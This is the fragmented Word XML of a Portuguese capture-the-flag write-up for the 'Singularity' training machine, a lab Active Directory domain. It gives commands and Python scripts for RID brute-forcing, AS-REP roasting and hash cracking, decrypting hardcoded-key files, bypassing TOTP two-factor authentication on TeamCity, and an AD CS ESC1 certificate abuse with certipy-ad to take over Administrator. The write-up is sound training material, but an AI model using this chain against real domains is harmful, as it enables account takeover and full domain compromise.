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atcuj2chpaqp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p8jbceytwvmm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Singularity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1kwvxkvonl7b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realizada a enumeração das portas abertas e dos serviços expostos na máquina alvo.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22500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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22500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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identificadas diversas portas abertas, incluindo serviços típicos de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Domain Controller Windows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(DNS),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(Kerberos),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135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(MSRPC),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139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(NetBIOS-SSN),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389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(LDAP),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(Microsoft-DS),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593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(RPC over HTTP),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636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(LDAPS)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3389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(RDP). Foi identificado o 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singularity.hc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o hostname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DC01.singularity.hc.</w:t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endereço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máquina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adicionado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permitir a resolução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DNS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domínio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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DC01.singularity.hc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singularity.hc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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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realizada a enumeração de usuários do domínio utilizando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RID Brute Force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</w:t>
      </w:r>
      <w:hyperlink r:id="rId12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NetExec.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&lt;macine-ip&gt;-u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--rid-brute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'SidTypeUser'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'\\'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82700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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identificados os usuários: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Guest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krbtgt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DC01$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svc-webapp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dev-marcus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build-agent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m.jhony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svc-teamcity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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realizado um ataque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AS-REP Roasting.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AS-REP Roasting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explora contas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Active Directory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pré-autenticação Kerberos desabilitada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Nesses casos, é possível obter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AS-REP criptografado com a senha do usuário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realizar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cracking offline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a senha for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fraca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conta é comprometida sem gerar tentativas de login.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GetNPUsers.py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singularity.hc/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-dc-ip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DC01.singularity.hc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-usersfile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file-path/users.txt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-no-pass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6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obtido o hash do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svc-webapp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O tipo de hash foi identificado com hashcat.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–identify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/home/gabrie0x6c/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords.txt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04900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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92300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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senha foi quebrada com sucesso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resultando na descoberta da credencial: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svc-webapp / PolniyPizdec0211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89200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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as credenciais obtidas, foi realizada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enumeração SMB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Utilizando o usuário comprometido, foi possível autenticar no serviço e enumerar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diretórios e arquivos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disponíveis.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svc-webapp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PolniyPizdec0211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enumeração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uma pasta do sistema chamada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DevOps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não faz parte das pastas padrão do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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//singularity.hc/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svc-webapp%PolniyPizdec0211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51000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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download de todo o conteúdo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pasta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DevOps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análise.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//singularity.hc/DevOps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svc-webapp%PolniyPizdec0211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76400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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01900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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90600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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o download dos arquivos, foi identificada a pasta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Singularity Projects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contendo os arquivos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CryptoVault.dll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CryptoVault.exe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data.enc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realizada a análise da biblioteca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CryptoVault.dll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strings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CryptoVault.dll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16400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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descobertas credenciais hardcoded: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chave mestra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salt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S1ngul4r1ty_M@st3rK3y_2025!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SingularitySalt. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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ez6vjycv8vkq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user flag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desenvolvido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 em Python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descriptografar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data.enc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AES em modo CBC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base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chave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mestra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salt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previamente identificados.</w:t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Crypto.Cipher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"S1ngul4r1ty_M@st3rK3y_2025!"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STATIC_SALT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b"SingularitySalt"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derive_key(password):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md5_hash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hashlib.md5(password.encode()).digest()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md5_hash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md5_hash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generate_iv():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hashlib.md5(STATIC_SALT).digest()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open('Singularity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Projects/data.enc',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'rb')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data[0:4]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data[4:6]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data[6:14]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enc_length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int.from_bytes(data[14:18],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'little')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encrypted_data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data[18:18+enc_length]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print(f"Magic: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{magic}")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{version.hex()}")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print(f"Encrypted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{enc_length}")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derive_key(MASTER_KEY)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generate_iv()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(MD5):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{key.hex()}")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(MD5):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{iv.hex()}")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AES.new(key,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AES.MODE_CBC,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cipher.decrypt(encrypted_data)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padding_len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decrypted[-1]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decrypted[:-padding_len]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open('decrypted_correct.txt',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'wb')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out.write(decrypted)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print(decrypted.decode('utf-8',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errors='ignore'))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descriptografar o arquivo data.enc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sucesso.</w:t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descriptografado corresponde a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arquivo no formato 7-Zip (7z)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decrypted_correct.txt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86000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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extração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7-Zip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encontrados os arquivos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Database.kdbx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keyfile.key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06700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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utilizado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realizar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extração de dados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Database.kdbx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test_keyfile_only.py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pykeepass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PyKeePass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kdbx_file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'Database.kdbx'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'keyfile.key'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password)...")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PyKeePass(kdbx_file,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password=None,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keyfile=keyfile)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print("\n🎉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kp.entries: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{entry.title}")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{entry.username}")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{entry.password}")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entry.url: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{entry.url}")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entry.notes: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{entry.notes}")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print("-"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{str(e)[:200]}")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print("\n[*]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PyKeePass(kdbx_file,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password='',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keyfile=keyfile)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print("\n🎉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kp.entries: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print(f"{entry.title}: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{entry.username}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{entry.password}")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{str(e)[:200]}")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test_keyfile_only.py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05200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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descriptografia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Database.kdbx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identificadas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credenciais do TeamCity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sendo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dev-marcus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a senha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vSjasnel12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associadas ao serviço em</w:t>
      </w:r>
      <w:hyperlink r:id="rId2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http://singularity:8111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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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esse acesso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TeamCity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TOTP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descriptografado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bypass do 2FA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associado à conta.</w:t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singularity_decrypt_totp.py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'SCRIPT'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#!/usr/bin/env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hmac,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hashlib,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Crypto.Cipher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argon2.low_level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hash_secret_raw,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evp_bytes_to_key(password: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key_len=32,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iv_len=16):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"""OpenSSL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MD5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derivation."""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b'',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len(d)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iv_len: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hashlib.md5(prev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salt).digest()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d[:key_len],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d[key_len:key_len+iv_len]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openssl_decrypt(b64data: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"""Decrypt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(AES-256-CBC,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EVP_BytesToKey)."""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base64.b64decode(b64data)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raw[:8]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b"Salted__",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raw[8:16],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raw[16:]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evp_bytes_to_key(password.encode(),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AES.new(key,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AES.MODE_CBC,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cipher.decrypt(ciphertext)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pt[-1]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ValueError("Bad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pt[:-pad]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argon2_derive(argon2_hash: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out_len=48):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"""Derive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parameters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argon2_hash.split('$')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{kv.split('=')[0]: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int(kv.split('=')[1])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parts[3].split(',')}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base64.b64decode(parts[4])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hash_secret_raw(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secret=password.encode(),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salt=salt,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time_cost=params['t'],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memory_cost=params['m'],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parallelism=params['p'],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hash_len=out_len,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type=Type.ID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argon2_decrypt(b64data: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argon2_hash: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base64.b64decode(b64data)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raw[:8]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b"Salted__",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raw[8:16],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raw[16:]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argon2_derive(argon2_hash,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derived[:32],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derived[32:48]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AES.new(key,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AES.MODE_CBC,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cipher.decrypt(ciphertext)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pt[-1]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ValueError("Bad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pt[:-pad]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show_totp(secret_bytes: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secret_bytes.decode().strip()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all(c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"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567="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s.upper())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base64.b32encode(secret_bytes).decode()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base64.b32encode(secret_bytes).decode()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pyotp.TOTP(secret)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print(f"\nDecrypted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(Base32):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{secret}")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{totp.now()}")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print(f"Prev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(-30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{totp.at(int(time.time())-30)}")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(+30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{totp.at(int(time.time())+30)}")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len(sys.argv)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print("Usage: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singularity_decrypt_totp.py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sys.exit(1)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json.load(open(sys.argv[1]))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sys.argv[2]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secret_b64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data[list(data.keys())[0]]["secret"]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enc_key_b64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data["key"]["enc"]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data["key"]["hash"]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key_plain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openssl_decrypt(enc_key_b64,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key_plain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argon2_decrypt(enc_key_b64,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argon2_hash)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secret_plain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openssl_decrypt(secret_b64,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key_plain.decode(errors='ignore'))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secret_plain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argon2_decrypt(secret_b64,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key_plain.decode(errors='ignore'),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argon2_hash)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show_totp(secret_plain)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singularity_decrypt_totp.py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totp_data.json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'vSjasnel12'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30300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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obtido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código TOTP do TeamCity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possibilitando o acesso à aplicação pelo endereço</w:t>
      </w:r>
      <w:hyperlink r:id="rId31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http://singularity:8111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dev-marcus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vSjasnel12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398896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57500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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71800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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57400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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acesso ao serviço, na área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realizado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backup do TeamCity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http://singularity.hc:8111/admin/admin.html?item=backup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38500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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36900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Os arquivos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backup da aplicação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foram baixados para análise. Durante a revisão, no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project-config.xml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encontradas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credenciais armazenadas em texto claro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sendo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m.jhony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a senha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ypOSJXPqlDOxxbQSfEERy30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62100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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as credenciais obtidas, foi realizada uma tentativa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acesso remoto à máquina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a ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId39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Evil-WinRM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evil-winrm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m.jhony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'ypOSJXPqlDOxxbQSfEERy300'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57300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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acesso remoto à máquina foi obtido com sucesso, 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flag de usuário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localizada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Desktop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m.jhony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92300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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csdxa6t5d534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root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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utilizado </w:t>
      </w:r>
      <w:hyperlink r:id="rId42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Certipy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vulnerabilidades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 CS.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Certipy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uma ferramenta para enumeração e exploração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Active Directory Certificate Services (AD CS)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  <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Ela identifica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templates e permissões inseguras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permite abusos de certificados.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">É usada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escalonamento de privilégios e comprometimento do domínio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certipy-ad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m.jhony@singularity.hc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'ypOSJXPqlDOxxbQSfEERy300'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-dc-ip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-vulnerable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14600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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identificadas vulnerabilidades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 ESC1, ESC4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ESC15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ESC4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ocorre quando um usuário possui permissões excessivas sobre templates de certificados, permitindo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modificação de configurações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posterior abuso para obter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certificados privilegiados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ESC15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envolve templates configurados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autenticação de máquina/usuário de forma insegura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emissão de certificados que podem ser usados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impersonação e escalonamento de privilégios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ESC1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ocorre quando um template de certificado permite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Client Authentication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 solicitante pode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definir arbitrariamente o Subject/UPN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Isso permite emitir um certificado em nome de outro usuário, inclusive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Domain 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20260124220844_Certipy.json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00200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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ESC1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é necessário obter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SID do usuário alvo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(por exemplo,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porque ele é usado na solicitação do certificado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impersonar a identidade correta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durante a autenticação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RPC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  <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">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correto, o certificado emitido pode ser aceito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Active Directory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pertencente ao usuário privilegiado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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rpcclient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"m.jhony%ypOSJXPqlDOxxbQSfEERy300"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singularity.hc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"lookupnames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S-1-5-21-3139681580-4135018421-750518322-500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8300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Esse comando emite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certificado válido para o usuário Administrator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autenticação no Active Directory sem a necessidade de senha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certipy-ad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m.jhony@singularity.hc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'ypOSJXPqlDOxxbQSfEERy300'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-dc-ip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dc01.singularity.hc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'singularity-DC01-CA'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'User'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'administrator@singularity.hc'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'S-1-5-21-3139681580-4135018421-750518322-500'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14500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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certificado emitido foi utilizado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autenticação via LDAP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alteração da senha do usuário Administrator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foi redefinida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NovaSenha@123!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certipy-ad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-pfx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administrator.pfx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-dc-ip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-ldap-shell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change_password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NovaSenha@123!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65300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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senha redefinida, foi obtido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acesso remoto como Administrator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Evil-WinRM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evil-winrm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'NovaSenha@123!'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81100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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flag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localizada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C:\Users\Administrator\Desktop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87500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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headerReference r:id="rId50" w:type="default"/>
      <w:headerReference r:id="rId51" w:type="first"/>
      <w:headerReference r:id="rId52" w:type="even"/>
      <w:footerReference r:id="rId53" w:type="default"/>
      <w:footerReference r:id="rId54" w:type="first"/>
      <w:footerReference r:id="rId55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9">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.170oxjxi27vw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58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7A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B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56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4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Singularity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46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hyperlink" Target="https://github.com/ly4k/Certipy" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId49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training/training-machines/298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hyperlink" Target="http://singularity:8111" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://singularity:8111" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackplayers/evil-winrm" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://singularity:8111" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://singularity:8111" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netexec.wiki/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId1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3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XU1jvCZB+rqHuAMAh5EhcFd4Pg==">CgMxLjAyDmguYXRjdWoyY2hwYXFwMg5oLnA4amJjZXl0d3ZtbTIOaC4xa3d2eGt2b25sN2IyDmguZXo2dmp5Y3Y4dmtxMg5oLmNzZHhhNnQ1ZDUzNDIOaC4xNzBveGp4aTI3dnc4AHIhMUhseGlhQ0RHYWdmM1pnU1BmUTdKOTlSd0hUM3NzdWRN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